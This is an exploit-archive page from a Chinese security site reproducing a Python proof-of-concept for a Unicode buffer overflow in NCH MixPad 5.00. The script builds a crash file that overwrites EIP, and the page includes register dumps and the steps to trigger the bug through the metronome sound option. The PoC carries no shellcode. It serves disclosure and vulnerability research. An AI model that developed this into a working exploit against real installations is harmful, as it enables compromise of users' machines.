首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MixPad 5.00 - Buffer Overflow 来源：@bzyo_ 作者：bzyo 发布时间：2018-01-24   #!/usr/bin/python   # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow # Date: 21-01-2017 # Vulnerable Software: NCH Software MixPad # Vendor Homepage: http://www.nch.com.au/mixpad # Version: v5.00 # Software Link: http://www.nch.com.au/mixpad/mpsetup.exe # Tested On: Windows XP # # # PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' # # no unicode jmp/call to esp # # EAX 00117700 # ECX 001167F0 # EDX 7C90E514 ntdll.KiFastSystemCallRet # EBX 00000000 # ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed." # EBP 00116FAC # ESI 0000004E # EDI 00117740 # EIP 00CC00CC   filename="crash.txt"   junk = "A"*251 eip = "\xcc"*2              #eip over; jmp/call esp goes here fill = "B"*100              #only 6 used in esp buffer = junk + eip + fill      textfile = open(filename , 'w') textfile.write(buffer) textfile.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·NEC Univerge SV9100/SV8100 Web ·RAVPower 2.000.056 - Memory Di ·Simple ASC CMS 1.2 Database Di ·HP Connected Backup 8.6/8.8.6 ·PHPFreeChat 1.7 - Denial of Se ·Photography CMS 1.0 - Cross-Si ·macOS 10.13 (17A365) - Kernel ·Asus Unauthenticated LAN Remot ·Smiths Medical Medfusion 4000 ·MikroTik RouterOS < 6.38.5 Rem ·glibc - 'getcwd()' Local Privi ·GoAhead Web Server LD_PRELOAD   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved